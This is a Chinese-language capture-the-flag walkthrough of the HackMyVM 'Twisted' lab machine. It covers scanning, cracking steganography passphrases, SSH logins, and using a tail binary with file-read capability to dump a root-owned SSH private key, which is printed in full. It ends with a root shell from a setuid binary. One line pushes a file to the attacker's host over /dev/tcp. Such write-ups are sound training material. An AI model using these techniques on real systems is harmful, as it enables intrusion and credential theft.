Twisted
Twisted
信息搜集
端口扫描
1
rustscan -a 192.168.0.127 -- -A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Open 192.168.0.127:80
Open 192.168.0.127:2222
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkxSQQDpisrFNA7vdjeM1rqhZ5oxeiJV/upxZHBxLaY4QQIkf+Wg/hbrc1mIJJvICUF12/CYmr6Mex+ZPrjPZEICTEZeKUyiKs8orRoxEXtBSxe6cPhfpPCBJB/nUwgu0YaD45cvlX1OY0Hg5Z7yfLB+cuThu6rk0bF+DY8s8/azizG7+kHUSbYvYc7MHgoB4803gTDqS5JVgTx77Nf3+f2MxdEZhwEA2hdKG8mFlDhmdO7CKswKsrj8Zr2atkWxNd09Duk3bYotPHRL5tsLBfwRPUOc73QUh6yG+1Jy8WAwsIasl9dTi3F/nV/mpefszOCRasYx26DzxIxw0Q3Ewr
| 256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL44mqXXp9R1yPGaglEeWWSvRlxYmyP8VSQzTqvGRzqyhdguk+1aTulnzwb9Gm6VSWhYF2ImBhcUgjrXSLWOLIc=
| 256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK4CKLJXwHGu5mD+kZzH4DyaMOHv4Fqb75JrzeOPRfsA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali💀kali)-[~/temp/Twisted]
└─$ gobuster dir -u http://192.168.0.127/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.0.127/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,bak,jpg,txt,png
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 330683 / 1543927 (21.42%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 334392 / 1543927 (21.66%)
===============================================================
Finished
===============================================================
漏洞发现
踩点
提取隐藏信息
下载下来看一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(kali💀kali)-[~/temp/Twisted]
└─$ wget http://192.168.0.127/cat-original.jpg
--2024-04-20 02:26:07-- http://192.168.0.127/cat-original.jpg
Connecting to 192.168.0.127:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 288693 (282K) [image/jpeg]
Saving to: ‘cat-original.jpg’
cat-original.jpg 100%[=========================================================================>] 281.93K --.-KB/s in 0.001s
2024-04-20 02:26:07 (209 MB/s) - ‘cat-original.jpg’ saved [288693/288693]
┌──(kali💀kali)-[~/temp/Twisted]
└─$ wget http://192.168.0.127/cat-hidden.jpg
--2024-04-20 02:26:15-- http://192.168.0.127/cat-hidden.jpg
Connecting to 192.168.0.127:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 288706 (282K) [image/jpeg]
Saving to: ‘cat-hidden.jpg’
cat-hidden.jpg 100%[=========================================================================>] 281.94K --.-KB/s in 0.002s
2024-04-20 02:26:15 (124 MB/s) - ‘cat-hidden.jpg’ saved [288706/288706]
┌──(kali💀kali)-[~/temp/Twisted]
└─$ ls -la
total 576
drwxr-xr-x 2 kali kali 4096 Apr 20 02:26 .
drwxr-xr-x 55 kali kali 4096 Apr 20 02:14 ..
-rw-r--r-- 1 kali kali 288706 Oct 14 2020 cat-hidden.jpg
-rw-r--r-- 1 kali kali 288693 Oct 14 2020 cat-original.jpg
┌──(kali💀kali)-[~/temp/Twisted]
└─$ stegseek -wl /usr/share/wordlists/rockyou.txt cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(kali💀kali)-[~/temp/Twisted]
└─$ cat cat-hidden.jpg.out
thisismypassword
┌──(kali💀kali)-[~/temp/Twisted]
└─$ stegseek -wl /usr/share/wordlists/rockyou.txt cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(kali💀kali)-[~/temp/Twisted]
└─$ cat cat-original.jpg.out
markuslovesbonita
mateo
sexymama
markus
westlife
markuslovesbonita
thisismypassword
爆破一下
mateo thisismypassword
markus markuslovesbonita
ssh连一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
┌──(kali💀kali)-[~/temp/Twisted]
└─$ ssh mateo@192.168.0.127 -p 2222
The authenticity of host '[192.168.0.127]:2222 ([192.168.0.127]:2222)' can't be established.
ED25519 key fingerprint is SHA256:+Vy+50OqnmO0eOU2nhxE0uNjMjXrtpHTmrYtml4yF3s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.0.127]:2222' (ED25519) to the list of known hosts.
mateo@192.168.0.127's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$ ls -la
total 36
drwxr-xr-x 3 mateo mateo 4096 Oct 14 2020 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw------- 1 mateo mateo 5 Oct 14 2020 .bash_history
-rw-r--r-- 1 mateo mateo 220 Oct 13 2020 .bash_logout
-rw-r--r-- 1 mateo mateo 3526 Oct 13 2020 .bashrc
drwxr-xr-x 3 mateo mateo 4096 Oct 14 2020 .local
-rw------- 1 mateo mateo 25 Oct 14 2020 note.txt
-rw-r--r-- 1 mateo mateo 807 Oct 13 2020 .profile
-rw------- 1 mateo mateo 53 Oct 14 2020 .Xauthority
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
mateo@twisted:~$ cat .bash_history
exit
mateo@twisted:~$ cd /var/www/html/
mateo@twisted:/var/www/html$ python3 -V
Python 3.7.3
mateo@twisted:/var/www/html$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.143 - - [20/Apr/2024 02:33:44] "GET /gogogo.wav HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
mateo@twisted:/var/www/html$ su -l markus
Password:
markus@twisted:~$ ls -la
total 28
drwxr-xr-x 3 markus markus 4096 Oct 14 2020 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw-r--r-- 1 markus markus 220 Oct 14 2020 .bash_logout
-rw-r--r-- 1 markus markus 3526 Oct 14 2020 .bashrc
drwxr-xr-x 3 markus markus 4096 Oct 14 2020 .local
-rw------- 1 markus markus 85 Oct 14 2020 note.txt
-rw-r--r-- 1 markus markus 807 Oct 14 2020 .profile
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
markus@twisted:~$ cat /var/cache/apt/id_rsa
cat: /var/cache/apt/id_rsa: Permission denied
markus@twisted:~$ ls -l /var/cache/apt/id_rsa
-rw------- 1 root root 1823 Oct 14 2020 /var/cache/apt/id_rsa
分析音频
1
2
3
4
5
6
7
8
9
10
11
┌──(kali💀kali)-[~/temp/Twisted]
└─$ wget http://192.168.0.127:8888/gogogo.wav
--2024-04-20 02:33:42-- http://192.168.0.127:8888/gogogo.wav
Connecting to 192.168.0.127:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1130160 (1.1M) [audio/x-wav]
Saving to: ‘gogogo.wav’
gogogo.wav 100%[=========================================================================>] 1.08M --.-KB/s in 0.03s
2024-04-20 02:33:42 (34.0 MB/s) - ‘gogogo.wav’ saved [1130160/1130160]
听一下,明显是摩斯密码,使用网站解析一下:
1
G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .
兔子洞。。。。
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
markus@twisted:~$ find / -perm -u=s -type f 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
markus@twisted:~$ getcap -r / 2>/dev/null
markus@twisted:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
尝试使用tail获取我们想要的信息:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
markus@twisted:~$ tail -n 50 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
然后使用私钥进行登录!
1
2
3
4
5
6
7
markus@twisted:/home$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 14 2020 .
drwxr-xr-x 18 root root 4096 Oct 13 2020 ..
drwxr-xr-x 4 bonita bonita 4096 Oct 14 2020 bonita
drwxr-xr-x 3 markus markus 4096 Oct 14 2020 markus
drwxr-xr-x 3 mateo mateo 4096 Oct 14 2020 mateo
私钥登录
搜集一下信息:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bonita@twisted:~$ whoami;id
bonita
uid=1002(bonita) gid=1002(bonita) groups=1002(bonita)
bonita@twisted:~$ ls -la
total 52
drwxr-xr-x 4 bonita bonita 4096 Oct 14 2020 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw-r--r-- 1 bonita bonita 220 Oct 14 2020 .bash_logout
-rw-r--r-- 1 bonita bonita 3526 Oct 14 2020 .bashrc
-rwsrws--- 1 root bonita 16864 Oct 14 2020 beroot
drwxr-xr-x 3 bonita bonita 4096 Oct 14 2020 .local
-rw-r--r-- 1 bonita bonita 807 Oct 14 2020 .profile
drwx------ 2 bonita bonita 4096 Oct 14 2020 .ssh
-rw------- 1 bonita bonita 12 Oct 14 2020 user.txt
bonita@twisted:~$ cat user.txt
HMVblackcat
bonita@twisted:~$ file beroot
beroot: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fecfbde059505a54f66d3229cc9ebb78f997a7ba, not stripped
逆向程序获取密码
尝试运行一下程序:
1
2
3
4
5
bonita@twisted:~$ ./beroot
Enter the code:
root
WRONG
下载到本地看一下:
1
2
nc -lp 1234 > beroot
cat beroot >/dev/tcp/192.168.0.143/1234
使用ida64打开看一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+1Ch] [rbp-4h]
printf("Enter the code:\n ", argv, envp, argv);
scanf("%i", &v4);
if ( v4 == 5880 )
{
setuid(0);
setgid(0);
system("/bin/bash");
}
else
{
puts("\nWRONG");
}
return 0;
}
得到密码5880,go!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~# ls -la
total 52
drwxr-xr-x 4 bonita bonita 4096 Oct 14 2020 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw-r--r-- 1 bonita bonita 220 Oct 14 2020 .bash_logout
-rw-r--r-- 1 bonita bonita 3526 Oct 14 2020 .bashrc
-rwsrws--- 1 root bonita 16864 Oct 14 2020 beroot
drwxr-xr-x 3 bonita bonita 4096 Oct 14 2020 .local
-rw-r--r-- 1 bonita bonita 807 Oct 14 2020 .profile
drwx------ 2 bonita bonita 4096 Oct 14 2020 .ssh
-rw------- 1 bonita bonita 12 Oct 14 2020 user.txt
root@twisted:~# cd /root
root@twisted:/root# ls -la
total 24
drwx------ 3 root root 4096 Oct 14 2020 .
drwxr-xr-x 18 root root 4096 Oct 13 2020 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Oct 14 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 16 Oct 14 2020 root.txt
root@twisted:/root# cat root.txt
HMVwhereismycat
拿下root!
本文由作者按照 CC BY 4.0 进行授权